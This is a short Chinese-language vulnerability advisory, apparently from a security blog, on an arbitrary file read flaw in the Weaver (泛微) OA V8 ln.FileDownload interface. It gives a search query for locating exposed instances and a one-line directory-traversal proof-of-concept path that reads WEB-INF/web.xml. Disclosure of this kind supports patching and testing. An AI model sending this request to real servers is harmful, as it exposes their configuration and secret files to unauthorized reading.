泛微OA E-Weaver ln.FileDownload 任意文件读取漏洞

漏洞描述

泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。

漏洞影响

泛微OA V8

网络测绘

app=”泛微-协同办公OA”

漏洞复现

登陆页面

20231207105948823-png (4)

验证POC

/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml

20231207170058641-1628479992921-2645d12d-2180-4e6f-bd87-8d1e2ff2cbb7.adad1ffa_2023-12-07_17-00-35 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容